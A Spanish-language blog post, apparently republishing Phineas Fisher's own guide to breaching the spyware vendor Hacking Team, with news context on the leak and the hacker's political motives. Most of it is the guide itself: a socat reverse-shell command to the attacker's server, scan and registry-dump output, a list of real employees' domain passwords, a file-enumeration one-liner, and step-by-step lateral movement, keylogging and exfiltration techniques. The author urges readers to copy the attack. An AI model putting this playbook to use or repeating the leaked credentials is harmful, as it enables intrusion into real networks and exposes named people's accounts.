Tienda Wifi

Tienda Wifi
CiudadWireless es la tienda Wifi recomendada por elhacker.NET

Buscador

Entradas Mensuales

Suscripción

¿Quieres recibir las últimas novedades del blog en tu correo?

¡Suscríbete al feed!

Foro de elhacker.net - Noticias

elhacker.NET en Facebook

Entradas populares

PostHeaderIcon Phineas Fisher explica cómo hackeó a Hacking Team




La filtración de Hacking Team fue noticia en todo el mundo, pero nadie sabía mucho sobre el autor o cómo lo hizo. Ese misterio por fin ha sido revelado. Después de ocho meses de silencio casi completo, Phineas Fisher , el pseudónimo detrás de la persona que realizó el ataque, ha publicado una guía en español DIY (Do It Yourself) con la explicación detallada con las herramientas y la forma en que rompió la seguridad de los sistemas de la empresa y puso al descubierto sus secretos mejor guardados, como algunos  de sus clientes en España: el CNI, la Guardia Civil y la Policía.





Hacking Team era una empresa que ayudó a los gobiernos a hackear y espiar a periodistas, activistas, contrincantes políticos, y otras amenazas a su poder Y, muy de vez en cuando, a criminales y terroristas  A Vincenzetti, el CEO, le gustaba terminar sus correos con el eslogan fascista "boia chi molla". Sería más acertado "boia chi vende RCS". También afirmaban tener tecnología para solucionar el "problema" de Tor y el darknet



Phineas Fisher, se coló en la red de hacking team en silencio y filtró más de 400 gigabytes de datos, pero también sirve como un manifiesto de sus ideales políticos y los motivos detrás del acceso.

Antes alguien tenía que colarse en las oficinas para filtrar documentos. Se necesitaba una pistola para robar un banco. Hoy en día puedes hacerlo desde la cama con un portátil en las manos Como dijo la CNT después del hackeo de Gamma Group: "intentaremos dar un paso más adelante con nuevas formas de lucha". El hackeo es una herramienta poderosa, ¡aprendamos y luchemos!

Al finalizar la guía el autor comenta:

Y eso es todo lo que se necesita para acabar con una empresa y poner fin a sus abusos contra los derechos humanos
Con sólo 100 horas de trabajo, una persona puede deshacer años de trabajo de una empresa multimillonaria. 

En la guía, Phineas Fisher anima a otros a seguir su ejemplo


Phineas Fisher argumentó que filtrar documentos para demostrar la corrupción y el abuso de poder es realmente "hacking ético", en lugar de hacer el trabajo de consultoría para las empresas que a menudo son los que realmente merecen ser hackeados.

Hacking Team es una empresa italiana que vende el software espía y los servicios de hacking a la policía y los servicios de inteligencia en todo el mundo. A través de los años, los investigadores han documentado varios casos en los que se utilizaron herramientas de Hacking Team contra periodistas, disidentes, o activistas.

En la noche que el hacker publicó los datos, se reveló a ser la misma persona que en 2014 hackeó también Gamma Internacional, competidor de un equipo de hackers que vende software espía llamado FinFisher.

 Durante meses, sin embargo, una gran pregunta ha quedado sin respuesta: ¿cómo el hacker logró desconcertar y poseer por completo una empresa cuyo modelo de negocio conjunto dependía exactamente sobre hackear otras personas?

En ese momento, el hacker prometió que pronto lo diría a el mundo. Sólo quería que esperar un poco de tiempo, él dijo en Twitter, hasta el equipo de Hacking "tenía un poco de tiempo para fallar en averiguar lo que pasó y quedar fuera del negocio."

En su guía, publicada el viernes, el hacker explicó cómo se utiliza una vulnerabilidad desconocida, o de día cero (0day), para obtener el primer punto de apoyo en la red interna de Hacking Team. Teniendo en cuenta que el fallo aún no ha sido parcheado, sin embargo, Phineas Fisher no proporcionó ningún detalle sobre lo que la vulnerabilidad es exactamente, o donde la encontró.

Después de entrar, el hacker dijo que se movía alrededor cuidadosamente, en primer lugar la descarga de mensajes de correo electrónico, a continuación, acceder a otros servidores y partes de la red. Tener privilegios administrativos obtenidos dentro de la red principal de Windows de la compañía, Phineas Fisher dijo que espiando  a los administradores de sistemas, sobre todo Cristiana Pozzi, dado que por lo general tienen acceso a toda la red. Después de haber robado las contraseñas de Pozzi mediante el registro de sus pulsaciones del teclado, el hacker dijo que accede y exfiltraron todo el código fuente de la compañía, que se encuentra alojado en una red aislada separada.

En ese punto, se restablece la contraseña de Twitter de hacking Team con la función "¿Olvidó su contraseña", y el día 5 de julio, anunció el hack usando propia cuenta de Twitter de la compañía.



El hacker dijo que él estaba dentro de la red de Hacking Team durante seis semanas, y que le llevó más o menos 100 horas de trabajo para moverse y obtener todos los datos. A juzgar por sus palabras, está claro Phineas Fisher tuvo una fuerte motivación política para ataque informático del Hacking Team.

Quiero dedicar esta guía para las víctimas del asalto a la escuela Armando Díaz, y todos los que tenían la sangre derramada por los fascistas italianos

En referencia a la incursión sangrienta en la escuela italiana en Génova en 2001, donde fuerzas policiales irrumpieron en una escuela donde se alojaron contra el G-8 activistas del Foro Social Genao, dando como resultado la detención de 93 activistas. Los métodos de la incursión y posterior detención, sin embargo, eran tan controvertido que 125 policías fueron llevados a juicio, acusados de golpear y torturar a los detenidos.

El hacker también rechazó que se le defina como un vigilante, y optó por una definición más política.

"Me caracterizo por ser un revolucionario anarquista, no como un vigilante", dijo en un correo electrónico. "Los vigilantes actúan fuera del sistema, pero la intención de llevar a cabo el trabajo del sistema judicial, la policía y ninguno de los cuales yo soy un fan de. Soy claramente un criminal, no está claro si hacking equipo ha hecho nada ilegal. Si alguien, la piratería del equipo son los vigilantes, que actúa en los márgenes en busca de su amor por la autoridad y la ley y el orden ".

El hacking permite el más débil da la oportunidad de luchar y ganar

El hacking es una herramienta poderosa. Vamos a aprender y lucha!


Escribió, citando el sindicato anarcosindicalista Comisión Nacional de Trabajo, o CNT. Después de Phineas Fisher hackó Grupo Gamma en 2014, la CNT dijo que era la tecnología clara era sólo otro frente en la lucha de clases, y que era el momento de "dar un paso adelante" con "nuevas formas de lucha."

Es imposible verificar si todos los detalles en la guía son verdaderas, ya que ninguno de los equipos de Hacking ni las autoridades italianas se han dado a conocer todo lo relacionado con el hack.

"Cualquier comentario debe provenir de las autoridades policiales italianos que han estado investigando el ataque sobre la piratería del equipo, así que no hay comentario de la empresa," el portavoz de Hacking Team, Eric Rabe, dijo en un correo electrónico. La oficina del fiscal italiano no pudo ser contactado para hacer comentarios.

No está claro cómo va la investigación, pero Phineas Fisher no parece demasiado preocupado por si va a ser atrapado. En otra sección de su guía, que describió que Hacking Team como una empresa que ayudaron a los gobiernos espiar a activistas, periodistas, opositores políticos, y "muy de vez en cuando" criminales y terroristas. El hacker también se refirió a las afirmaciones de piratería del equipo que estaba desarrollando tecnología para rastrear criminales que utilizan la red Tor y en la web oscura.

"Pero teniendo en cuenta que todavía estoy libre", escribió snarkily, "Tengo dudas sobre su eficacia."



Introducción


A menudo sale en las noticias que han atribuido un ataque a un grupo de hackers gubernamentales (los "APTs"), porque siempre usan las mismas herramientas, dejan las mismas huellas, e incluso usan la misma infraestructura (dominios, correos etc). Son negligentes porque pueden hackear sin consecuencias legales.

No quería hacer más fácil el trabajo de la policía y relacionar lo de Hacking Team con los hackeos y apodos de mi trabajo cotidiano como hacker de guante negro. Así que usé servidores y dominios nuevos, registrado con correos nuevos y pagado con direcciones de bitcoin nuevas. Además, solo usé herramientas públicas y cosas que escribí especialmente para este ataque y cambié mi manera de hacer algunas cosas para no dejar mi huella forense normal.



Después del hackeo de Gamma Group, describí un proceso para buscar vulnerabilidades.

 Hacking Team tiene un rango de IP pública:
inetnum: 93.62.139.32 - 93.62.139.47
descr: HT public subnet

Hacking Team tenía muy poco expuesto en internet. Por ejemplo, a diferencia a Gamma Group, su sitio de atención al cliente necesita un certificado del cliente para conectar. Lo que tenía era su sitio web principal (un blog Joomla en que Joomscan no revela ningún fallo grave), un servidor de correos, un par de routers, dos dispositivos VPN, y un dispositivo para filtrar spam. Entonces tuve tres opciones:


  1. buscar un 0day en Joomla, 
  2. buscar un 0day en postfix, o
  3.  buscar un 0day en uno de los sistemas embebidos. Un 0day en un sistema embebido me pareció la opción más alcanzable, y después de dos semanas de trabajo de ingeniería inversa, logré un exploit remoto de root. Dado que las vulnerabilidades aún no han sido parcheadas, no voy a dar más detalles.


Hay mucho trabajo y pruebas antes de usar el exploit contra Hacking Team.

Escribió un firmware con backdoor, y compiló varias herramientas de post-explotación para el sistema embebido. El backdoor sirve para proteger el exploit. Usar el exploit sólo una vez y después volviendo por el backdoor hace más difícil el trabajo de descubrir y parchear las vulnerabilidades.



Herramientas utilizadas en el ataque a Hacking Team


Las herramientas de post-explotación que había preparado eran:

  • 1) busybox Para todas las utilidades comunes de UNIX que el sistema no tiene
  • 2) nmap Para escanear y fingerprint la red interna de Hacking Team.
  • 3) Responder.py La herramienta más útil para atacar a redes Windows cuando tienes acceso a la red interna pero no tienes un usuario de dominio.
  • 4) Python Para ejecutar Responder.py
  • 5) tcpdump Para husmear tráfico.
  • 6) dsniff Para espiar contraseñas de protocolos débiles como ftp, y para hacer
  • arpspoofing. Quería usar ettercap, escrito por los mismos ALoR y NaGA de Hacking Team, pero era difícil compilarlo para el sistema.
  • 7) socat Para un shell cómodo con pty: mi_servidor: socat file:`tty`,raw,echo=0 tcp-listen:mi_puerto sistema hackeado: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \ tcp:mi_servidor:mi_puerto Y para muchas cosas más, es una navaja suiza de redes. Véase la sección de ejemplos de su documentación.
  • 8) screen Como los pty de socat, no es estrictamente necesario, pero quería sentirme como en casa en las redes de Hacking Team.
  • 9) un servidor proxy SOCKS Para usar junto a proxychains para acceder a la red interna con cualquier otro programa.
  • 10) tgcd Para reenviar puertos, como lo del servidor SOCKS, a través del firewall.

Lo peor que podía pasar era que mi backdoor o herramientas de post-explotación dejasen inestable el sistema e hicieran que un empleado lo investigase. Por lo tanto, pasé una semana probando mi exploit, backdoor, y herramientas de post-explotación en las redes de otras empresas vulnerables antes de entrar en la red de Hacking Team.

Base de datos NoSQL


NoSQL, o más bien NoAutenticación, ha sido un gran regalo a la comunidad hacker. Cuando me preocupo de que por fin han parcheado todo los fallos de omisión de autenticación en MySQL [2][3][4][5], se ponen de moda nuevas bases de datos sin autenticación por diseño. Nmap encuentra unos pocos en la red
interna de Hacking Team:

27017/tcp open mongodb MongoDB 2.6.5
| mongodb-databases:
| ok = 1
| totalSizeMb = 47547
| totalSize = 49856643072
...
|_ version = 2.6.5

27017/tcp open mongodb MongoDB 2.6.5
| mongodb-databases:
| ok = 1
| totalSizeMb = 31987
| totalSize = 33540800512
| databases
...
|_ version = 2.6.5

Fueron las bases de datos para instancias de prueba de RCS. El audio que graba RCS es guardado en MongoDB con GridFS. La carpeta audio en el torrent [6] viene de esto. Se espiaban sin querer a sí mismos.

Aunque fue divertido escuchar grabaciones y ver imágenes webcam de Hacking Team desarrollando su malware, no fue muy útil. Sus inseguras copias de seguridad fueron la vulnerabilidad que abrieron sus puertas. Según su documentación [1], sus dispositivos iSCSI deben estar en una red aparte, pero nmap encuentra unos en su subred 192.168.1.200/24:

Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
...
3260/tcp open iscsi?
| iscsi-info:
| Target: iqn.2000-01.com.synology:ht-synology.name
| Address: 192.168.200.66:3260,0
|_ Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
...
3260/tcp open iscsi?
| iscsi-info:
| Target: iqn.2000-01.com.synology:synology-backup.name
| Address: 10.0.1.72:3260,0
| Address: 192.168.200.72:3260,0
|_ Authentication: No authentication required

y encontramos copias de seguridad de varias máquinas virtuales. El servidor de Exchange parece lo más interesante. Es demasiado grande como para descargarlo, pero podemos montarlo remoto y buscar archivos interesantes:

$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT

entonces el offset es 2048 * 512 = 1048576

$ losetup -o 1048576 /dev/loop1 /dev/loop0
$ mount -o ro /dev/loop1 /mnt/exchange/

ahora en /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
encontramos el disco duro de la máquina virtual, y lo montamos:

vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

... y por fin hemos desempaquetado la muñeca rusa y podemos ver todos los archivos del antiguo servidor Exchange en /mnt/part1

 ¿Cuáles eran las contraseñas de los administradores de Hacking Team?

Lo que más me interesa de la copia de seguridad es buscar si tiene una contraseña o hash que pueda usar para acceder al servidor actual. Uso pwdump, cachedump, y lsadump [1] con los archivos del registro. lsadump encuentra la contraseña de la cuenta de servicio besadmin:

_SC_BlackBerry MDS Connection Service
0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........

Uso proxychains [2] con el servidor socks en el sistema embebido y smbclient [3] para comprobar la contraseña:

proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'

!Funciona! La contraseña de besadmin aún es válida, y es un administrador local. Uso mi proxy y psexec_psh de metasploit [4] para conseguir una sesión de meterpreter. A continuación migro a un proceso de 64 bits, "load kiwi" [5], "creds_wdigest", y ya tengo muchas contraseñas, incluso la del administrador del dominio:

Las contraseñas de los empleados de Hacking Team eran:

HACKINGTEAM BESAdmin bes32678!!!
HACKINGTEAM Administrator uu8dd8ndd12!
HACKINGTEAM c.pozzi P4ssword
HACKINGTEAM m.romeo ioLK/(90
HACKINGTEAM l.guerra 4luc@=.=
HACKINGTEAM d.martinez W4tudul3sp
HACKINGTEAM g.russo GCBr0s0705!
HACKINGTEAM a.scarafile Cd4432996111
HACKINGTEAM r.viscardi Ht2015!
HACKINGTEAM a.mino A!e$$andra
HACKINGTEAM m.bettini Ettore&Bella0314
HACKINGTEAM m.luppi Blackou7
HACKINGTEAM s.gallucci 1S9i8m4o!
HACKINGTEAM d.milan set!dob66
HACKINGTEAM w.furlan Blu3.B3rry!
HACKINGTEAM d.romualdi Rd13136f@#
HACKINGTEAM l.invernizzi L0r3nz0123!
HACKINGTEAM e.ciceri 2O2571&2E
HACKINGTEAM e.rabe erab@4HT!
Llama la atención poderosamente la contraseña de Cristina Pozzi :P

Introducción al Hacking de Dominios de Windows

Voy a dar un breve repaso a las técnicas para propagarse dentro de una red de Windows. Las técnicas para ejecutar de forma remota requieren la contraseña o hash de un administrador local en el objetivo. Con mucho, la manera más común de conseguir dichas credenciales es usar mimikatz [1], sobre todo sekurlsa::logonpasswords y sekurlsa::msv, en las computadoras donde ya tienes acceso administrativo. Las técnicas de movimiento "in situ" también requiren privilegios administrativos (salvo por runas). Las herramientas más importantes para escalada de privilegios son PowerUp [2], y bypassuac [3].

Movimiento Remoto:

1) psexec

La manera básica y probada de movimiento en redes de windows. Puedes usar psexec [1], winexe [2], psexec_psh de metasploit [3], invoke_psexec de powershell empire [4], o el comando de windows "sc" [5]. Para el módulo de metasploit, powershell empire, y pth-winexe [6], basta con saber el hash sin saber la contraseña. Es la manera más universal (funciona en cualquier computadora con puerto 445 abierto), pero también la manera menos cautelosa. Aparecerá en el registro de eventos el tipo 7045 "Service Control Manager". En mi experiencia, nunca se han dado cuenta durante un hackeo, pero a veces lo notan después y ayuda a los investigadores entender lo que ha hecho el hacker.

2) WMI

La manera más cautelosa. El servicio de WMI está habilitado en todas las computadoras de windows, pero salvo por servidores, el firewall lo bloquea por defecto. Puedes usar wmiexec.py [7], pth-wmis [6] (aquí tienen una demostración de wmiexec y pth-wmis [8]), invoke_wmi de powershell empire [9], o el comando de windows wmic [5]. Todos excepto wmic sólo necesitan el hash.

3) PSRemoting [10]

Está deshabilitado por defecto, y no les aconsejo habilitar nuevos protocolos que no sean necesarios. Pero si el sysadmin ya lo ha habilitado, es muy conveniente, especialmente si usas powershell para todo (y sí,
deberías usar powershell para casi todo, va a cambiar [11] con powershell 5 y windows 10, pero hoy en día powershell hace fácil hacer todo en RAM, esquivar los antivirus, y dejar pocas huellas).

4) Tareas programadas

Se pueden ejecutar programas remotos con at y schtasks [5]. Funciona en las mismas situaciones que psexec, y tambien deja huellas conocidas [12].

5) GPO

Si todos estos protocolos están deshabilitados o bloqueados por el firewall, una vez que eres el administrador del dominio, puedes usar GPO para darle un logon script, instalar un msi, ejecutar una tarea programada [13], o como veremos con la computadora de Mauro Romeo (sysadmin de Hacking
Team), habilitar WMI y abrir el firewall a través de GPO.

Movimiento "in situ":

1) Impersonalizando Tokens

Una vez que tienes acceso administrativo a una computadora, puedes usar los tokens de los demás usuarios para acceder a recursos en el dominio. Dos herramientas para hacer esto son incognito [1] y los comandos token::* de mimikatz [2].

2) MS14-068

Se puede aprovechar un fallo de validación en kerberos para generar un ticket de administrador de dominio [3][4][5].

3) Pass the Hash

Si tienes su hash pero el usuario no tiene sesión iniciada puedes usar sekurlsa::pth [2] para obtener un ticket del usuario.

4) Inyección de Procesos

Cualquier RAT puede inyectarse a otro proceso, por ejemplo el comando migrate en meterpreter y pupy [6] o psinject [7] en powershell empire. Puedes inyectar al proceso que tiene el token que quieras.

5) runas

Esto a veces resulta muy útil porque no require privilegios de administrador. El comando es parte de windows, pero si no tienes interfaz gráfica puedes usar powershell [8].


Persistencia: mantener el acceso


Una vez conseguido el acceso, quieres mantenerlo. Realmente, la persistencia solo es un desafío para hijos de puta como los de Hacking Team que quieren hackear a activistas u otros individuos. Para hackear empresas, no hace falta persistencia porque las empresas nunca duermen. Yo siempre uso "persistencia" al estilo de duqu 2, ejecutar en RAM en un par de servidores con altos porcentajes de uptime. En el hipotético caso de que todos reinicien a la vez, tengo contraseñas y un ticket de oro [1] para acceso de reserva. Puedes leer más información sobre los mecanismos de persistencia para windows aquí [2][3][4]. Pero para hackear empresas, no hace falta y aumenta el riesgo de detección.



La mejor herramienta hoy día para entender redes de Windows es Powerview [1]. Vale la pena leer todo escrito por el autor [2], ante todo [3], [4], [5], y [6]. Powershell en sí también es muy potente [7]. Como todavía hay muchos servidores 2003 y 2000 sin powershell, tienes que aprender también la vieja escuela [8], con herramientas como netview.exe [9] o el comando de windows "net view". Otras técnicas que me gustan son:

1) Descargar una lista de nombres de archivos

Con una cuenta de administrador de dominio, se pueden descargar todos los nombres de archivos en la red con powerview:

Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |
select fullname | out-file -append files.txt}

Más tarde, puedes leerlo a tu ritmo y elegir cuales quieres descargar.

2) Leer correos

Como ya hemos visto, se pueden descargar correos con powershell, y tienen muchísima información útil.

3) Leer sharepoint

Es otro lugar donde muchas empresas tienen información importante. Se puede descargar con powershell [10].

4) Active Directory [11]

Tiene mucha información útil sobre usuarios y computadoras. Sin ser administrador de dominio, ya se puede encontrar mucha información con powerview y otras herramientas [12]. Después de conseguir administrador de dominio deberías exportar toda la información de AD con csvde u otra herramienta.

5) Espiar a los empleados

Uno de mis pasatiempos favoritos es cazar a los sysadmins. Espiando a Christan Pozzi (sysadmin de Hacking Team) conseguí accesso al servidor Nagios que me dio acesso a la rete sviluppo (red de desarrollo con el código fuente de RCS). Con una combinación sencilla de Get-Keystrokes y Get-TimedScreenshot de PowerSploit [13], Do-Exfiltration de nishang [14], y GPO, se puede espiar a cualquier empleado o incluso al dominio entero.

Al leer la documentación de su infraestructura [1], me di cuenta que aún me faltaba acceso a algo importante - la "Rete Sviluppo", una red aislada que guarda todo el código fuente de RCS. Los sysadmins de una empresa siempre tienen acceso a todo. Busqué en las computadoras de Mauro Romeo y Christian Pozzi para ver como manejan la red sviluppo, y para ver si había otros sistemas interesantes que debería investigar. Fue sencillo acceder a sus computadoras ya que eran parte del dominio de windows en que tenía administrador. La computadora de Mauro Romeo no tenía ningún puerto abierto, así que abrí el puerto de WMI [2] para ejecutar meterpreter [3]. Además de grabar teclas y capturas con Get-Keystrokes y Get-TimedScreenshot, usé muchos módulos /gather/ de metasploit, CredMan.ps1 [4], y busqué archivos [5]. Al ver que Pozzi tenía una volumen Truecrypt, esperé hasta que lo había montado para copiar los archivos entonces. Muchos se han reído de las débiles contraseñas de Christian Pozzi (y de Christian Pozzi en general, ofrece bastante material para comedia [6][7][8][9]). Las incluí en la filtración como un despiste y para reírse de él. La realidad es que mimikatz y keyloggers ven todas las contraseñas iguales.

Dentro del volumen cifrado de Christian Pozzi, había un textfile con muchas contraseñas [1]. Una de ellas fue para un servidor de Fully Automated Nagios, que tenía acceso a la red sviluppo para poder monitorizarla. Había encontrado el puente. Sólo tenía la contraseña para la interfaz web, pero había una exploit pública [2] para ejecutar código y conseguir un shell (es un exploitno autenticado, pero hace falta que un usuario tenga sesión iniciada para la cual usé la contraseña del textfile).

Leyendo los correos, había visto a Daniele Milan concediendo acceso a repositorios git. Ya tuve su contraseña de windows gracias a mimikatz. La intenté con el servidor git y funcionó. Intenté sudo y funcionó. Para el servidor gitlab y su cuenta de twitter, utilicé la función "olvidé mi contraseña", y mi acceso al servidor de correos para restablecer la contraseña.

Las guías de hacking suelen terminar con una advertencia: esta información es solo para fines educativos, sé un hacker ético, no ataques a computadoras sin permiso, blablablá. Voy a decir lo mismo, pero con un concepto más rebelde de hacking "ético". Sería hacking ético filtrar documentos, expropiar dinero a los bancos, y proteger las computadoras de la gente común. Sin embargo, la mayoría de las personas que se autodenominan "hackers éticos" trabajan sólo para proteger a los que pagan su tarifa de consultoría, que a menudo son los mismos que más merecen ser hackeados.

En Hacking Team se ven a sí mismos como parte de una tradición de inspirador diseño italiano [1]. Yo les veo a Vincenzetti, su empresa, y sus amigotes de la policía, carabineros, y gobierno, como parte de una larga tradición de fascismo italiano. Quiero dedicar esta guía a las víctimas del asalto a la escuela Armando Diaz, y a todos aquellos que han derramado su sangre a manos de fascistas italianos.


Fuente:
https://motherboard.vice.com/read/the-vigilante-who-hacked-hacking-team-explains-how-he-did-it?x
http://pastebin.com/raw/GPSHF04A

0 comentarios :

Publicar un comentario

Los comentarios pueden ser revisados en cualquier momento por los moderadores.

Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.

Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.